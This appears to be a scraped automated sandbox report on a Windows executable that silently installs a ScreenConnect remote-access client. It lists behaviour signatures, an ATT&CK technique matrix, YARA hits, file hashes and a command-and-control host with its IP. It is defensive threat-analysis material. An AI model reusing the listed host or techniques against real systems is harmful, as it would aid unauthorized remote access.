                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_055B1868 CreateNamedPipeW,8_2_055B1868
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_013B4D30 RtlGetVersion,8_2_013B4D30
                              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: file.exe, type: SAMPLE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.2c6fa28.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.950000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.file.exe.5af0000.8.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.file.exe.5af0000.8.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.file.exe.ad5db8.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 10.2.ScreenConnect.WindowsClient.exe.314fa60.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.file.exe.a263d8.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.file.exe.aac3d8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.file.exe.a10000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2163119833.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2155397067.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6516, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 716, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4180, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6196, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Config.Msi\5de52c.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSIE7CB.tmp, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Component Object Model Hijacking
                              1
                              Component Object Model Hijacking
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                              Process Injection
                              1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Valid Accounts
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                              Virtualization/Sandbox Evasion
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Hidden Users
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Bootkit
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Rundll32
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557086 Sample: file.exe Startdate: 17/11/2024 Architecture: WINDOWS Score: 48 55 kasin22.zapto.org 2->55 61 Multi AV Scanner detection for submitted file 2->61 63 .NET source code contains potential unpacker 2->63 65 .NET source code references suspicious native API functions 2->65 67 5 other signatures 2->67 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 file.exe 5 2->15         started        signatures3 process4 dnsIp5 35 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->35 dropped 37 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->37 dropped 39 C:\...\ScreenConnect.ClientService.exe, PE32 8->39 dropped 43 10 other files (1 malicious) 8->43 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        57 kasin22.zapto.org 194.59.30.222, 49714, 8041 COMBAHTONcombahtonGmbHDE Germany 12->57 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        41 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 15->41 dropped 81 Contains functionality to hide user accounts 15->81 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 31 rundll32.exe 11 17->31         started        69 Creates files in the system32 config directory 23->69 71 Contains functionality to hide user accounts 23->71 45 C:\Users\user\AppData\Local\...\MSIE114.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 4 other files (none is malicious) 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              file.exe26%VirustotalBrowse
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll0%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe3%VirustotalBrowse
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSIE114.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Windows\Installer\MSIE7EB.tmp0%ReversingLabs
                              C:\Windows\Installer\MSIEC9F.tmp0%ReversingLabs
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              kasin22.zapto.org0%VirustotalBrowse
                              No Antivirus matches
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              kasin22.zapto.org
                              194.59.30.222
                              truetrueunknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                high
                                http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000008.00000002.3393549461.0000000001CB3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                      high
                                      https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                        high
                                        https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          194.59.30.222
                                          kasin22.zapto.orgGermany
                                          30823COMBAHTONcombahtonGmbHDEtrue
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1557086
                                          Start date and time:2024-11-17 10:31:07 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 10s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:16
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:file.exe
                                          Detection:MAL
                                          Classification:mal48.evad.winEXE@17/56@1/1
                                          EGA Information:
                                          • Successful, ratio: 60%
                                          HCA Information:
                                          • Successful, ratio: 73%
                                          • Number of executed functions: 487
                                          • Number of non-executed functions: 3
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target file.exe, PID 6516 because it is empty
                                          • Execution Graph export aborted for target rundll32.exe, PID 716 because it is empty
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                          No simulations
                                          No context
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          COMBAHTONcombahtonGmbHDEDEMASI-24-12B DOC. SCAN.exeGet hashmaliciousGuLoader, RemcosBrowse
                                          • 194.59.31.40
                                          Orden de Noviembre.com.exeGet hashmaliciousAsyncRATBrowse
                                          • 194.59.31.47
                                          monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 194.59.30.201
                                          monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 194.59.30.201
                                          0jg24sHn9q.exeGet hashmaliciousRemcosBrowse
                                          • 194.59.31.120
                                          VDsZYqbfHI.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 194.59.31.9
                                          2siOtP5z21.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 194.59.31.9
                                          7uihPKvK0C.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 194.59.31.9
                                          VDsZYqbfHI.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 194.59.31.9
                                          1bNQ03YM1i.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 194.59.31.9
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dllsetup.msiGet hashmaliciousScreenConnect ToolBrowse
                                            monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                              monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    statments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            extukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):219658
                                                              Entropy (8bit):6.583563814033734
                                                              Encrypted:false
                                                              SSDEEP:3072:ej9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGWT:ejuH2aCGw1ST1wQLdqvWT
                                                              MD5:8727F5F38D750CF471F5C80A51120FD7
                                                              SHA1:5CF2EFB747916C94944EDDF00B5E01343B1EEDF4
                                                              SHA-256:C3AB9B34E27DDF3133393BE0C18B512D86D05B4F6B4D99AC80307ECD32FCFE68
                                                              SHA-512:D97D01F5D45F47E33A87B3C4A99F8135F19AB9E2A0A988A7672815BA778646A76800017816F0A05FE1FE09366D0214A994D41DF8ADBF7163A0BDB4FC6B1AB0AC
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\5de52c.rbs, Author: Joe Security
                                                              Reputation:low
                                                              Preview:...@IXOS.@.....@.$qY.@.....@.....@.....@.....@.....@......&.{C65824D8-9903-AFB4-B430-141024FF968F}'.ScreenConnect Client (e6cb77284cf765aa)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{C65824D8-9903-AFB4-B430-141024FF968F}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (e6cb77284cf765aa)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{F7DC6ACE-2599-29C8-925C-5B3ACC994D1F}&.{C65824D8-9903-AFB4-B430-141024FF968F}.@......&.{E75F3825-615D-A6C3-18A8-A81116BE1B2A}&.{C65824D8-9903-AFB4-B430-141024FF968F}.@......&.{1D30660B-8729-B08B-2523-3D6361F833F5}&.{C65824D8-9903-AFB4-B430-141024FF968F}.@......&.{55FD4F1A-E122-32D9-E968-E1A92B874A9A}&.{C65824D8-9903-AFB4-B430-141024FF968F}.@......&.{C4DED9E9-A5FD-85FC-68B4-A71C4571FDD1}&.{C65824D8-9903-AFB4-B430-141024FF968F}.@......&.{5DC0AA41-9852-0F50-6DDF-17F08295A631}&.{C65824D8-9903-AFB4-B430-141024FF968F}.@....
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):227
                                                              Entropy (8bit):4.836043831200555
                                                              Encrypted:false
                                                              SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsl:rHy2DLI4MWoj12K9cAul
                                                              MD5:DFD0BDFF874BB29B508F15BDD35CB6A3
                                                              SHA1:DE772D64129E084D150D8087CCDAC16EF97FB185
                                                              SHA-256:38BDCC2EC25E7464DDE7293B5A6EC64EEA4B9D9F6FB8C36FDCC5677A6F55B721
                                                              SHA-512:6ADDFAE10478871085C796F2AF5A11CD78088FC49B245DF2229DB7546973FF9A16785C72BF61F569E16A3E79F7F48EF8C1BADB91313271D9515AF3D3B4B759B0
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.......
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):13217
                                                              Entropy (8bit):5.573331139429914
                                                              Encrypted:false
                                                              SSDEEP:96:r5KNK/KkVU4MdLEbxw2vWeqcy/zrqr7syJcAYswQ7ELOq76igQbBvNJpfkyBw/F+:r8EvnkrIAdD7tPbDLovvvLqHCKS/bjB8
                                                              MD5:3E2AAEB2CEA70C3508085356777FAF2E
                                                              SHA1:AAA701D78F61B061CE143FC32FB73A4809F1A665
                                                              SHA-256:C0350217C247E02BC32838FDD89EC3ED25BDC0B995C0FBAE99A169A07989662D
                                                              SHA-512:840BBF782E1956EAAA99304B5C7F17A9003DA4844BCE03FC27C493A187CF1E19D28333F6919816B43352C408047E963AD1C21A242AA85716746F200E57342DD7
                                                              Malicious:false
